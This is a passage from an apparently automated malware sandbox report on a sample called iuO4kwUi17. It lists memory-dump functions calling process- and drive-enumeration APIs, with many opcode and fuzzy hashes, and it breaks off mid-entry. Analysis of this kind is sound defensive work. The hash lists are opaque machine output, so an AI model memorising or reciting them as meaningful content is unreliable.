                                    • Instruction ID: b9e7a11309171e2af290aabf6a9794b4729503dcd50eff3f401690b5f5d31563
                                    • Opcode Fuzzy Hash: 9005d777d6bbc2315ed37238e3761f6dd984944a70c32d3514dfa504db729681
                                    • Instruction Fuzzy Hash: 5B3145F752C220EEA24A86959B505FA636EF6D7330F308926F40FC75C2E3E54A094271
                                    Function 075E01D0 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 6e359c6ba404fcdd3e296db64ef33f411519ea6be3928268e541969aabefa494
                                    • Instruction ID: cb5aaa06e39ed95b7026f72dd2c5f7dc1200753f1105e4f8f2ba93b1898016ac
                                    • Opcode Fuzzy Hash: 6e359c6ba404fcdd3e296db64ef33f411519ea6be3928268e541969aabefa494
                                    • Instruction Fuzzy Hash: 3F3148FB52C220EEA24A85959B506FA676EF6D7330F308926F40FC75C2E3E54A095171
                                    Function 075F0447 Relevance: 1.7, APIs: 1, Instructions: 160COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 802a3ad5cfaa6b67d3faf14fb5ad31e868380901e63336f586b35c3378ece38b
                                    • Instruction ID: 3070c11da86f2f162a7b8a5fa01d163838b99516afb7bc4795802ec951c02154
                                    • Opcode Fuzzy Hash: 802a3ad5cfaa6b67d3faf14fb5ad31e868380901e63336f586b35c3378ece38b
                                    • Instruction Fuzzy Hash: A1314BEB55C1227D3112E0556B689FB5B6EE0D3730738CC2AF90BD6987E2C44E4A1071
                                    Function 075E0235 Relevance: 1.7, APIs: 1, Instructions: 160COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: cecaceec88da10ff1fb12c04f136e8687523d6e5c3649e6cfe9bc69a5f8b0973
                                    • Instruction ID: 83232c4ae2d8f083a923b45d873da2da77922fcd84796fdd638d4092654b4d1a
                                    • Opcode Fuzzy Hash: cecaceec88da10ff1fb12c04f136e8687523d6e5c3649e6cfe9bc69a5f8b0973
                                    • Instruction Fuzzy Hash: 843148F752C221AFA24A81945F545F667AEF6D7330F30892AF40FCB5C2E3E54A094271
                                    Function 075E029B Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 4d4e2c3f480079b3c91ba51957ba9aa4da0ca6908eeb636e6180032f74405c30
                                    • Instruction ID: fde24c49356e2f9315bc91992590cd84d1910e3d2727a1e1c9eab8af2228f9b0
                                    • Opcode Fuzzy Hash: 4d4e2c3f480079b3c91ba51957ba9aa4da0ca6908eeb636e6180032f74405c30
                                    • Instruction Fuzzy Hash: F5315AF752C220AEA24A95A49F506FA636EF2D7330F308926F80FC75C2F3D59A094171
                                    Function 075F03B8 Relevance: 1.7, APIs: 1, Instructions: 156COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: b6f3bd01e85e0bb2fa232d2994cc1d856903a9301854dc70f69294702d6a26a6
                                    • Instruction ID: 902468b044f0bdfb022c17f2022c4e018e4476af80e6080c700e99a7e5095670
                                    • Opcode Fuzzy Hash: b6f3bd01e85e0bb2fa232d2994cc1d856903a9301854dc70f69294702d6a26a6
                                    • Instruction Fuzzy Hash: 38212BEB55D121BD715290452F68AFB566EF0D3730738CC2AFA0BD69C7E2C84E4A2071
                                    Function 075E0259 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 85ae3224a4666137d605c9cbf4a72dee86f2d07b54ea94b09c39d65773258942
                                    • Instruction ID: 3133fbf50fc8235a25ac2f07342a491c6040c2b9141307497c8bdd5d939985c5
                                    • Opcode Fuzzy Hash: 85ae3224a4666137d605c9cbf4a72dee86f2d07b54ea94b09c39d65773258942
                                    • Instruction Fuzzy Hash: CB317BF752C220AEA24A91945F546FA626EF2D7730F308926F40FC75C2F3D54A090171
                                    Function 075F03C6 Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 5bfa84380bb6cd65cfbde59df586461069b72ca84b423b2cc587155aa4a8c187
                                    • Instruction ID: 33de5e05a1011737e25481a13042017d304a9b42bda9b4d33a76e701b8c85877
                                    • Opcode Fuzzy Hash: 5bfa84380bb6cd65cfbde59df586461069b72ca84b423b2cc587155aa4a8c187
                                    • Instruction Fuzzy Hash: 7A2128EB55D122BC711290552F68AFB566EE0D3730738CC2AFA0BD69C7E2C80E4A2071
                                    Function 075E026F Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: f61d196a7a68b14f9b7911ed07534a4d6157d64beb73d22806e493eae4e219d7
                                    • Instruction ID: c79ddf7584868ca31d594fb08e5324c70bb3c13079a8134fcd4a6257ff9b5505
                                    • Opcode Fuzzy Hash: f61d196a7a68b14f9b7911ed07534a4d6157d64beb73d22806e493eae4e219d7
                                    • Instruction Fuzzy Hash: 1D3187FB56C220AEA24A81945F906FA632EF2D7330F308926F40FC75C2E3D54A094271
                                    Function 075E024E Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 8de04045b572fd6539ece944632a50d63f70a32b0abbf8249f7f0a2ae361b462
                                    • Instruction ID: 31b28c2c61594973c11a9de6f1455ae8b13e99daa8c59dcc6cacc8ae33d69fc9
                                    • Opcode Fuzzy Hash: 8de04045b572fd6539ece944632a50d63f70a32b0abbf8249f7f0a2ae361b462
                                    • Instruction Fuzzy Hash: 343148F752C221BEA24E81955F51AFA626EF2DB330F30892AF40FC75C2E3E54A094171
                                    Function 075E0282 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 360c147c89c59e13e5d16dd277f282d27fb6d7d4b570ea03d8cff7ce082ff3dc
                                    • Instruction ID: 8ad35f4c3f7df2508cc15920298eabcfb47294a95d1438a97c550da65abecd05
                                    • Opcode Fuzzy Hash: 360c147c89c59e13e5d16dd277f282d27fb6d7d4b570ea03d8cff7ce082ff3dc
                                    • Instruction Fuzzy Hash: 573148F792C224AFA24A95945F906F7626EF2D7330F30892AF40FC75C2E3E44A094270
                                    Function 075F0463 Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 6f153f86835c5c70a6d3b0bbc4884e6ad88a0fee99d7a9c67196e5c9d9aec2e8
                                    • Instruction ID: c12d178e67f63a908f3716ed4be42d2c82c8276b4c91774e1dbc396525b9ef2c
                                    • Opcode Fuzzy Hash: 6f153f86835c5c70a6d3b0bbc4884e6ad88a0fee99d7a9c67196e5c9d9aec2e8
                                    • Instruction Fuzzy Hash: 6F21FCEB55D1617C715291552B28AFB572EE0D3730738CC27F50BD6987E2C80A4E2071
                                    Function 075F03F4 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 166a8504725cb4f0edd44a5930591f51cdbb1c93f8e897d7bd557b0b1392a888
                                    • Instruction ID: 24acf4670916060e8d9e4f0755ba6320b52628a7d8a377899c9f3aad514cf84b
                                    • Opcode Fuzzy Hash: 166a8504725cb4f0edd44a5930591f51cdbb1c93f8e897d7bd557b0b1392a888
                                    • Instruction Fuzzy Hash: 60212CEB55D1627C7152A1552F28AFB576EE0D7730738CC26F90BD6987E2C80E4E1072
                                    Function 075A02C4 Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: 63e3af74b977e7c5ae1bc8144a4b3a23f80da463ce3473d765afbcd0c30a9fcf
                                    • Instruction ID: 2ae27975b2f388fe65249124c2c5a6bc06327c6609b68c7512e5778834a7ac0e
                                    • Opcode Fuzzy Hash: 63e3af74b977e7c5ae1bc8144a4b3a23f80da463ce3473d765afbcd0c30a9fcf
                                    • Instruction Fuzzy Hash: 6921A1E797C225BE724281966B509FF6B6DF5D7630B308D37F50BC5981F2E40A095132
                                    Function 075E0316 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 804c7e17d1355e58716f05600c202ab0cd900530cd07ff4130e468d3096a70aa
                                    • Instruction ID: 6a0e930f0daad3ba830bf3969de09997bc0b8d11238a3b0439afc5686bfbfd24
                                    • Opcode Fuzzy Hash: 804c7e17d1355e58716f05600c202ab0cd900530cd07ff4130e468d3096a70aa
                                    • Instruction Fuzzy Hash: 4D21B6E756C121BEB14E40952F51AF7565EF1DB7307318926F84FC65C2E2D88E0A0271
                                    Function 075F0484 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 325b7399892e9b098e8cb6ffc114d2537e8c2c7d6b9751f2d3bce0746c6ba9e1
                                    • Instruction ID: 6ce1b55ea3768199a9dca22ec941dedd38d5ac03f71b146c36d43dcb59dc9e96
                                    • Opcode Fuzzy Hash: 325b7399892e9b098e8cb6ffc114d2537e8c2c7d6b9751f2d3bce0746c6ba9e1
                                    • Instruction Fuzzy Hash: 7821C2EB95C1227D7143A0506B689F71B6EF4D36307388C26FA0BD6AC3E2844E4A0071
                                    Function 075A0308 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: 5a0a5bb26e4478358ed770dde638cd8d1cad2b0d6acc6f1e6187ab1b7961014a
                                    • Instruction ID: 356d9fe45b5bb3ecaf1de2a7456ba038400fb7000025c4db4bb3bba51f005d81
                                    • Opcode Fuzzy Hash: 5a0a5bb26e4478358ed770dde638cd8d1cad2b0d6acc6f1e6187ab1b7961014a
                                    • Instruction Fuzzy Hash: E221D7E7A6C2157EB34285A52B549FF6B6DF5D3730B308C3BF80BC6546F2944A095232
                                    Function 075E02D8 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 34a32784e01d500b722d43236a5eedb8d9f4426d556f5dd301213bb5e157712e
                                    • Instruction ID: 432b5401941a7c950a9a3038640d560549469d83c7463f624e015c623f4b3268
                                    • Opcode Fuzzy Hash: 34a32784e01d500b722d43236a5eedb8d9f4426d556f5dd301213bb5e157712e
                                    • Instruction Fuzzy Hash: A21190FB56C125BE714A80952F55AFB562EF2EB730B308926B80FC65C2F3D84A490171
                                    Function 075E02FC Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: e477d0f03dfe2cfc4b74844690fb2d7aefc233ef3eb5c6d166441c0a8808cba2
                                    • Instruction ID: 08d19a3fe7ea5fc899e03a28cd0fe4c441a849986c3fc6103ac2f130d3ab0604
                                    • Opcode Fuzzy Hash: e477d0f03dfe2cfc4b74844690fb2d7aefc233ef3eb5c6d166441c0a8808cba2
                                    • Instruction Fuzzy Hash: 9911B4FB56C121BE714A80952F55AF7562EF2DB730B708926F80FC65C2F3D44A490171
                                    Function 075F0430 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 4da8e4ecf6a8a046c16d7a93763383ce4c3969771be1ac2c70c2da5522e99ffa
                                    • Instruction ID: f10e79d17be08632634765bf498dee8988b52c130ce7334d14cee424186e6b56
                                    • Opcode Fuzzy Hash: 4da8e4ecf6a8a046c16d7a93763383ce4c3969771be1ac2c70c2da5522e99ffa
                                    • Instruction Fuzzy Hash: AD113DEB55D122BD7152A1552B689FA572EF4D73307388C26F60BDAA83E2C80B4A1071
                                    Function 075E0398 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 7b85291e4770280c862ad5bd7c2ad256ca94202dd13357886b318b7d4f30df12
                                    • Instruction ID: 4dd161194892a89c8109a827968fe0bb264816e61f13abb7a6ccde24c35762cc
                                    • Opcode Fuzzy Hash: 7b85291e4770280c862ad5bd7c2ad256ca94202dd13357886b318b7d4f30df12
                                    • Instruction Fuzzy Hash: 5111D3FB66C121BE614980952F11AF7171EF1EB731B308927F40FC65C2F2D48A091171
                                    Function 075E032E Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: b02e49cac42366195e1d511fa020a5fd1fc8418849a615adfb42153074c7ff01
                                    • Instruction ID: f39addb21dc175789c6710251ebd566e9d0a0957a48bead4e03867f6b0ab69a2
                                    • Opcode Fuzzy Hash: b02e49cac42366195e1d511fa020a5fd1fc8418849a615adfb42153074c7ff01
                                    • Instruction Fuzzy Hash: E91193EB56D121BE614980A52F51AF7171EF1DB730B308A26F84FC65C2F6D44A490171
                                    Function 075A0338 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: d514b327d3d1dded92c6395990927f76b24be24b8f0582907a05d8d28aaffd6a
                                    • Instruction ID: 52bf3f949f065782e3089feec56b030baab4bc24c059e2bd8f7902ba8781a076
                                    • Opcode Fuzzy Hash: d514b327d3d1dded92c6395990927f76b24be24b8f0582907a05d8d28aaffd6a
                                    • Instruction Fuzzy Hash: EF11B6EB96C215BEB241C5A66B505FF2B6DF5D3630B30CC3BF84BC5541F69449095232
                                    Function 075E0347 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 1f736154572e19ef15aa6679a8bce1e617a97ad40ba8e0347ff496dc9c0cdb10
                                    • Instruction ID: 5e18f95597e5538ce9e465229e494ce52876948d275c902f2717628cb121308c
                                    • Opcode Fuzzy Hash: 1f736154572e19ef15aa6679a8bce1e617a97ad40ba8e0347ff496dc9c0cdb10
                                    • Instruction Fuzzy Hash: F311E5EB96C121BD714E40952F51AF7561EF1EB731B318E26F80FD65C2F2D88A4902B1
                                    Function 075F0472 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,?,?), ref: 075F04A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920443192.00000000075F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75f0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 5760bd261a740798d095cebca9ddc8d2b6f73ef32235d8e4d8129a3fc69bb1ed
                                    • Instruction ID: 20197a2f2fcd32a29c07423b10fa6e34eac66475be8633e16a3dd54d819f97b0
                                    • Opcode Fuzzy Hash: 5760bd261a740798d095cebca9ddc8d2b6f73ef32235d8e4d8129a3fc69bb1ed
                                    • Instruction Fuzzy Hash: 3C1152EB55D2227D3152A1552B649FB162EF0D37307388C26F60BD6AC3D2C80F4A1071
                                    Function 075A03D3 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: ec6717607e9584bc68fc3d58b33ea6d3464bfc20377442bb9c4cc33e560f23a6
                                    • Instruction ID: 1b91e6fb19b4bb2c6d883364b4e92a97e467574a795bd7d33d64dcbc0e975075
                                    • Opcode Fuzzy Hash: ec6717607e9584bc68fc3d58b33ea6d3464bfc20377442bb9c4cc33e560f23a6
                                    • Instruction Fuzzy Hash: 771127E7D1C3417EF30286645B509FF2B6DF5C3230720887BF48BC6682E6A959054672
                                    Function 075E0357 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 969372233e651f4c2d68e036db5ad0ec6efd9a494d9fc8602e6f3d83c6cf1c7d
                                    • Instruction ID: 0e6bd9ca8ef1e5d1744f9b688218e420917dad7e9b5a51ecd5e9b10b08cc08fb
                                    • Opcode Fuzzy Hash: 969372233e651f4c2d68e036db5ad0ec6efd9a494d9fc8602e6f3d83c6cf1c7d
                                    • Instruction Fuzzy Hash: A11108EB92C120FD704E44912F519F7162EF1E7730B308A26F80F955C2F6E48A090271
                                    Function 075E03C1 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 9a29b1d68c8152bf96a2aea9fdd23c86c49a791ea2e7424c51e39b33315f5606
                                    • Instruction ID: 42d8c8a9007248ae70d18cafee8b11762c599820b1d653521c582f47f26f04b0
                                    • Opcode Fuzzy Hash: 9a29b1d68c8152bf96a2aea9fdd23c86c49a791ea2e7424c51e39b33315f5606
                                    • Instruction Fuzzy Hash: 1C01D6DB92D121BD600A90A42F219F6162EF1E7730B31CA16F84FC55C3F3D88A190271
                                    Function 075E036B Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                    • Process32FirstW.KERNEL32(00000011,00000011,00000011), ref: 075E03C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920425343.00000000075E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75e0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 166bed4e8f31a06ff3c1d8ac0067710aeeb95ff6dedfffc95ae9ae84557267fe
                                    • Instruction ID: 56f93f1f4f6e6cf342356933009b027b25cc3f7c508221741c19e8a0bac7f4cb
                                    • Opcode Fuzzy Hash: 166bed4e8f31a06ff3c1d8ac0067710aeeb95ff6dedfffc95ae9ae84557267fe
                                    • Instruction Fuzzy Hash: 7A1108EB91C111BDA14994A02F51AF6572EF6E7730B318926F84FCA5C3F3D88A1903B1
                                    Function 075A036F Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?), ref: 075A03C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1920349444.00000000075A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_75a0000_iuO4kwUi17.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: 135855e7dd720fbaad7c8626b5f8c9dcbba01eebe45f8d8ef3a63aba1cb4d238
